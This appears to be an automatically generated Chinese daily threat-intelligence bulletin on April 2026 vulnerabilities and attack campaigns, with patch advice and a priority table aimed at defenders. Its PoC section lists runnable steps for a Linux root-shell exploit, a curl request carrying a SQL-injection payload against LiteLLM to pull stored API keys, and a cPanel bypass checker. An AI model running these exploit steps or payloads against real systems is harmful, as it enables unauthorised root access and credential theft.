每日安全情报报告 · 2026-04-30
报告日期 :2026年04月30日 | 风险等级汇总 :🔴 严重×4 🟠 高危×2
本期焦点:Linux 内核 "Copy Fail" 零日全版本通杀 / cPanel 认证绕过在野利用 / Windows Shell 零点击哈希窃取 CISA 预警 / AI 网关 LiteLLM SQL 注入 36 小时内遭实战利用
一、高危漏洞速报
🔴 CVE-2026-31431 --- Linux 内核 "Copy Fail" 本地提权(LPE)
| 属性 | 详情 |
|---|---|
| 漏洞类型 | 内核逻辑缺陷 / 本地权限提升 (LPE) / 容器逃逸 |
| 受影响组件 | Linux Kernel(authencesn 模块,AF_ALG + splice() 链式调用) |
| CVSS 评分 | 9.8(严重) |
| 披露日期 | 2026-04-29 |
| 发现者 | Xint Code(Theori 公司) |
| 在野利用 | ⚠️ POC 已公开,漏洞静默存在近 10 年 |
漏洞描述 :authencesn 加密模块中存在直线型逻辑缺陷,攻击者通过组合 AF_ALG 套接字与 splice() 系统调用,可实现 4 字节页缓存(page-cache)任意写入,进而篡改 setuid 二进制文件,最终获取 root shell。无需竞态条件,732 字节 Python 脚本即可通杀 2017 年以来所有主流 Linux 发行版(Ubuntu、Amazon Linux、RHEL、SUSE、Debian、Arch 等)。
影响范围 :
-
Ubuntu 24.04 LTS / Amazon Linux 2023 / RHEL 10.1 / SUSE 16 及以上发行版
-
所有使用默认内核配置(AF_ALG 默认启用)的 Linux 系统
-
可用于 容器逃逸,威胁多租户云环境
修复建议 :
-
升级内核至包含主线提交
a664bf3d603d的版本 -
临时缓解:禁用
algif_aead模块
bash echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead 2>/dev/null || true -
容器/沙箱环境通过
seccomp限制 AF_ALG 套接字创建
🔴 CVE-2026-41940 --- cPanel & WHM 认证绕过(已在野利用)
| 属性 | 详情 |
|---|---|
| 漏洞类型 | CRLF 注入 / 认证绕过 |
| 受影响组件 | cPanel & WHM(v11.110.x ~ v11.136.x)/ WP Squared |
| CVSS 评分 | 9.8(严重) |
| 披露日期 | 2026-04-28 |
| 在野利用 | ⚠️ 已确认在野利用,疑似零日活动始于 2026-02-23 |
漏洞描述 :cPanel 守护进程 cpsrvd 在认证发生之前将新会话写入磁盘,且未对用户输入进行消毒处理。攻击者可通过恶意构造的 Basic Authorization 头注入原始 \r\n 字符,在会话文件中插入任意属性(如 user=root),触发会话重新加载后获得管理员级访问权限,全程无需有效凭证。Shodan 显示约 150 万个 cPanel 实例暴露于互联网。
受影响版本与修复版本:
| 受影响版本 | 修复版本 |
|---|---|
| cPanel & WHM 11.110.0 < 11.110.0.97 | 11.110.0.97 |
| cPanel & WHM 11.126.0 < 11.126.0.54 | 11.126.0.54 |
| cPanel & WHM 11.134.0 < 11.134.0.20 | 11.134.0.20 |
| cPanel & WHM 11.136.0 < 11.136.0.5 | 11.136.0.5 |
| WP Squared 11.136.1 < 11.136.1.7 | 11.136.1.7 |
修复建议:立即升级至官方修复版本;临时措施可封堵 TCP 2083(cPanel)和 2087(WHM)端口。
🔗 Rapid7 分析报告 | watchTowr 技术分析 | cPanel 官方安全公告
🔴 CVE-2026-42208 --- LiteLLM AI 网关预认证 SQL 注入(36 小时内在野利用)
| 属性 | 详情 |
|---|---|
| 漏洞类型 | SQL 注入 / 预认证 |
| 受影响组件 | BerriAI LiteLLM(v1.81.16 ~ v1.83.6) |
| CVSS 评分 | 9.3(严重) |
| 披露日期 | 2026-04-29 |
| 在野利用 | ⚠️ CVE 公开后 36 小时内发现在野利用 |
漏洞描述:LiteLLM 代理在 API 密钥验证流程中,将调用者提供的密值直接混入 SQL 查询文本而非参数化处理。攻击者无需任何认证,仅需在请求头注入 SQL 语法即可操纵数据库查询:
http
Authorization: Bearer ' OR '1'='1' --
由于 LiteLLM 通常作为 AI 网关集中管理 OpenAI、Anthropic、AWS Bedrock 等多家服务商凭证,成功利用可导致:云端 AI API 密钥批量窃取、财务损失(攻击者滥用高价值 API)及云基础设施横向移动。
修复建议:
bash
pip install --upgrade litellm==1.83.7
无法立即升级时,临时设置 disable_error_logs: true。
🔗 Vulert 详细分析 | Sysdig 威胁研究 | FreeBuf 报道
🔴 CVE-2026-32202 --- Windows Shell 欺骗漏洞(CISA 紧急预警,零点击)
| 属性 | 详情 |
|---|---|
| 漏洞类型 | NTLM 强制认证 / 欺骗漏洞(零点击) |
| 受影响组件 | Windows Shell(Windows 10/11 全系列 + Windows Server) |
| CVSS 评分 | 待 NVD 更新(高危) |
| 披露日期 | 2026-04-14(补丁发布) / 2026-04-29(CISA 确认在野利用) |
| 在野利用 | ⚠️ CISA 确认在野利用,已加入 KEV 目录 |
漏洞描述 :本漏洞为 CVE-2026-21510 的不完整补丁绕过 。受害者仅需在 Windows 资源管理器中打开包含恶意 LNK 文件的文件夹(无需点击),Explorer 在渲染图标时自动发起 SMB 连接至攻击者服务器,触发 NTLM 认证握手,泄露 Net-NTLMv2 哈希。攻击者可利用哈希进行 NTLM 中继攻击或离线破解,实现横向移动。
关键时间线 :4月14日微软发布补丁时未标记"已被利用",导致大量组织未优先修复,两周后 CISA 确认漏洞被活跃利用。
修复建议:立即安装 2026-04-14 微软补丁;网络层封堵出站 SMB(445/TCP)流量;限制 NTLM 在内网的使用范围。
🔗 CISA KEV 目录 | Help Net Security 分析 | The Hacker News 报道
🟠 CVE-2026-25874 --- Hugging Face LeRobot 未修复 RCE(无需认证)
| 属性 | 详情 |
|---|---|
| 漏洞类型 | Pickle 反序列化 / 远程代码执行 |
| 受影响组件 | Hugging Face LeRobot(近 24,000 GitHub Stars,暂无修复版本) |
| CVSS 评分 | 9.8(严重) |
| 披露日期 | 2026-04-28 |
| 补丁状态 | ❌ 尚未修复,官方正在评估 |
漏洞描述:LeRobot 异步推理架构中存在"无认证 gRPC + 不安全 Pickle 反序列化"危险组合(CVE-2026-25874)。攻击者可通过发送特制的 gRPC 请求,触发 Pickle 反序列化链,在目标机器上执行任意代码,无需任何凭证。广泛用于 AI 驱动的机器人研究场景,一旦被利用可导致实验室/生产机器人系统被完全接管。
🔗 The Hacker News 报道 | CSDN 分析 | NVD 详情
🟠 CVE-2026-1868 --- GitLab AI Gateway 模板注入 RCE
| 属性 | 详情 |
|---|---|
| 漏洞类型 | 模板注入 / 拒绝服务 / 远程代码执行 |
| 受影响组件 | GitLab Duo Self-Hosted AI Gateway(v18.1.6 ~ v18.8.0) |
| CVSS 评分 | 9.9(严重) |
| 披露日期 | 2026-02-08(持续关注中) |
漏洞描述:GitLab Duo Workflow Service 在处理用户提供的 Agent Platform Flow 定义时,未对模板内容进行充分过滤,导致模板注入漏洞。在最坏情况下可实现网关层面的远程代码执行(RCE),亦可触发拒绝服务,影响所有部署自托管 AI Gateway 的 GitLab 企业用户。
🔗 FreeBuf 分析 | 阿里云 AVD 详情 | GitLab 安全公告
二、漏洞 PoC 速递
PoC 1:CVE-2026-31431 "Copy Fail" --- 732 字节 Python 脚本通杀所有 Linux
来源 :Theori(Xint Code 团队)
GitHub 仓库 :theori-io/copy-fail-CVE-2026-31431
风险等级:🔴 严重(直接获取 root shell,无需竞态条件)
利用原理 :通过 AF_ALG 套接字与 splice() 系统调用的组合,实现对 /usr/bin/su 等 setuid 二进制文件的页缓存(page-cache)任意写入,篡改后直接执行获取 root 权限。
使用步骤(⚠️ 仅限授权渗透测试环境):
bash
# Step 1: 克隆 PoC 仓库
git clone https://github.com/theori-io/copy-fail-CVE-2026-31431.git
cd copy-fail-CVE-2026-31431
# Step 2: 确认 Python 版本(需 Python 3.10+,仅需标准库)
python3 --version
# Step 3: 执行漏洞利用(默认目标:/usr/bin/su)
python3 copy_fail_exp.py
# 可选:指定其他 setuid 二进制作为目标
# python3 copy_fail_exp.py /usr/bin/passwd
# Step 4: 脚本执行完毕后,运行 su 获取 root shell
su -
# id → uid=0(root)
技术细节 :
-
脚本仅 732 字节,依赖标准库(
os,socket,zlib) -
利用
algif_aead内核模块的逻辑缺陷 -
写入不持久(重启后恢复),但 root shell 真实有效
-
可作为容器逃逸原语(container escape primitive)
🔗 PoC 仓库 | Bugcrowd 技术分析 | ByteIota 详细解析
PoC 2:CVE-2026-42208 LiteLLM --- 预认证 SQL 注入复现环境
来源 :imjdl
GitHub 仓库 :imjdl/CVE-2026-42208_lab
风险等级:🔴 严重(无需认证,可窃取 AI 平台凭证)
利用原理:LiteLLM 代理在处理 API 密钥验证时未使用参数化查询,攻击者可通过构造恶意 Authorization 头实施 SQL 注入,读取数据库中存储的所有 AI 服务商 API 密钥。
使用步骤(⚠️ 仅限授权渗透测试环境):
bash
# Step 1: 克隆 PoC 复现实验室
git clone https://github.com/imjdl/CVE-2026-42208_lab.git
cd CVE-2026-42208_lab
# Step 2: 安装依赖并启动靶机环境
pip install -r requirements.txt
docker-compose up -d # 或按 README 说明部署
# Step 3: 执行注入测试(向 /chat/completions 端点发送)
curl -X POST http://TARGET:4000/chat/completions \
-H "Authorization: Bearer ' OR '1'='1' --" \
-H "Content-Type: application/json" \
-d '{"model": "gpt-4", "messages": [{"role": "user", "content": "test"}]}'
# Step 4: 利用 SQL 注入提取凭证表数据
# 目标表:litellm_credentials.credential_values / litellm_config
实战特征 :攻击者已表现出对 LiteLLM 数据库结构的了解,初步探测后定向访问 /key/generate、/key/info 等密钥管理端点,尝试将数据库读权限转化为代理控制权。
🔗 PoC 仓库 | Sysdig 威胁分析 | Vulert 详细报告
PoC 3:CVE-2026-41940 cPanel --- 认证绕过 Session 检测工具
来源 :debugactiveprocess(基于 watchTowr 分析)
GitHub 仓库 :debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker
风险等级:🔴 严重(可获取任意 cPanel 账户管理员权限)
使用步骤(⚠️ 仅限授权资产检测):
bash
# Step 1: 克隆 Session 检测工具
git clone https://github.com/debugactiveprocess/cPanel-WHM-AuthBypass-Session-Checker.git
cd cPanel-WHM-AuthBypass-Session-Checker
# Step 2: 安装 Python 依赖
pip install -r requirements.txt
# Step 3: 对目标 cPanel 实例进行会话绕过检测
python3 session_checker.py --target https://TARGET:2087 --check
# Step 4: 输出结果会显示目标是否存在会话验证缺陷
# 若确认漏洞,立即应用官方补丁(升级至修复版本)
技术要点 :通过省略 whostmgrsession Cookie 的预期字段并注入 CRLF 序列,在服务器端会话文件中写入 user=root 等任意属性,触发 cpsrvd 重新加载会话时获得管理员权限。
🔗 Session 检测工具 | watchTowr 分析 | Rapid7 ETR
三、安全圈动态
📰 文章一:朝鲜 Lazarus APT 推出 "Mach-O Man" macOS 四阶段恶意软件套件
来源 :GBHackers On Security(Mayura Kathir,2026-04-29)
标签:APT / 供应链攻击 / macOS / 加密货币
朝鲜国家级 APT 组织 Lazarus Group 推出新型 macOS 恶意软件套件 "Mach-O Man" ,采用 ClickFix 社会工程手法,通过 Telegram 冒充同事发送虚假 Zoom/Teams 会议邀请,诱导金融科技和加密货币企业高管手动复制执行终端命令。攻击链共分四阶段:初始 stager(teamsSDK.bin)→ 系统信息收集(D1YrHRTg.bin)→ macOS Keychain 及浏览器凭证窃取(macrasv2)→ 持久化(minst2.bin 伪装 OneDrive 注册 LaunchAgent)。本次活动已导致多家金融科技公司的 Keychain 密钥和加密货币钱包凭证泄露。
🔗 阅读原文
📰 文章二:"Mini Shai-Hulud" SAP npm 供应链攻击:220 万月下载包遭投毒
来源 :The Hacker News(2026-04-30)/ Snyk 安全团队
标签:供应链攻击 / npm / SAP / CI/CD 凭证窃取
安全研究人员披露一起自我命名为 "Mini Shai-Hulud" 的 npm 供应链攻击活动。攻击者篡改了 4 个 SAP CAP 生态系统相关 npm 包(月下载量超 220 万),注入混淆的预安装脚本(基于 Bun 运行时),在包安装时静默执行并窃取开发者环境变量、CI/CD secrets 及 API 密钥。OX Security 研究显示,相关凭证已泄露至超过 1,200 个代码仓库。建议立即审查项目依赖、轮换暴露凭证,并启用 npm audit 和依赖完整性校验。
🔗 The Hacker News 报道 | Snyk 技术分析 | OX Security 详情
📰 文章三:深度分析 Sorry 勒索软件的加密实现与行为特征
来源 :安全客 / 360(2026-04-29)
标签:勒索软件 / 加密分析 / 恶意软件逆向
安全研究人员对新型勒索软件 "Sorry" 进行深度剖析,重点揭示其底层加密实现机制和网络行为特征。该勒索软件采用混合加密策略,结合 AES-256 对称加密和 RSA 非对称密钥保护方案,具备快速文件遍历能力和网络传播组件。文章包含对其 C2 通信模式、文件加密范围选择逻辑及持久化机制的详细技术分析,为企业建立针对性检测规则提供参考。
🔗 安全客原文
📰 文章四:CISA 发出紧急预警 --- Windows Shell 零点击漏洞 CVE-2026-32202 正被活跃利用
来源 :Help Net Security(Zeljka Zorz,2026-04-29)
标签:CISA / Windows / NTLM / 零日
CISA 将 CVE-2026-32202 加入已知利用漏洞(KEV)目录,并要求联邦机构限期修复。该漏洞为 CVE-2026-21510 不完整补丁绕过,受害者仅需打开含恶意 LNK 的文件夹,Windows Explorer 即自动建立 SMB 连接泄露 NTLMv2 哈希,APT28 等高级威胁行为者已将该技术纳入武器库。此案例再次警示:补丁管理中"已利用"标记的滞后可导致大量组织未优先响应。
🔗 阅读原文 | The Register 分析 | CISA KEV 目录
📰 文章五:AI 时代的安全新风险 --- Cursor AI 扩展权限漏洞与 LeRobot RCE 双重曝光
来源 :Cyber Security News / The Hacker News(2026-04-30)
标签:AI 安全 / 开发者工具 / RCE / 访问控制
2026年4月30日,两项 AI 工具高危漏洞同日曝光:其一,广泛使用的 AI 编程环境 Cursor 被发现访问控制漏洞(CVSS 8.2),任何已安装的扩展均可获取开发者令牌,导致完整凭证被窃;其二,Hugging Face 开源机器人学习框架 LeRobot(CVE-2026-25874,CVSS 9.8)存在尚未修复的 gRPC + Pickle 反序列化组合 RCE 漏洞,无需认证即可在目标机上执行任意代码。两起事件共同揭示 AI 工具生态链安全审查不足的系统性风险。
🔗 The Hacker News LeRobot 报道 | Cursor 漏洞分析 | CVE-2026-25874 详情
四、风险处置优先级建议
| 优先级 | CVE / 事件 | 建议行动 | 截止时间 |
|---|---|---|---|
| 🔴 P0 | CVE-2026-31431 Linux 内核 Copy Fail | 升级内核 / 临时禁用 algif_aead | 立即 |
| 🔴 P0 | CVE-2026-41940 cPanel 认证绕过 | 升级至修复版本 / 封堵 2083/2087 端口 | 立即 |
| 🔴 P0 | CVE-2026-32202 Windows Shell 零点击 | 安装 4月14日补丁 / 封堵出站 SMB | 24h 内 |
| 🔴 P0 | CVE-2026-42208 LiteLLM SQL 注入 | 升级 litellm==1.83.7 | 立即 |
| 🟠 P1 | CVE-2026-25874 LeRobot RCE(未修复) | 隔离 gRPC 端口 / 关注官方补丁 | 48h 内 |
| 🟠 P1 | SAP npm 供应链投毒 | 审查依赖 / 轮换 CI/CD 凭证 | 24h 内 |
| 🟡 P2 | Lazarus Mach-O Man(macOS) | 排查 LaunchAgent / 审计 Terminal 使用 | 本周 |
本报告由自动化安全情报系统生成,信息来源:NVD / CISA KEV / The Hacker News / FreeBuf / 安全客 / GBHackers / Rapid7 / Snyk / GitHub。所有 PoC 信息仅供授权安全研究使用,请遵守相关法律法规。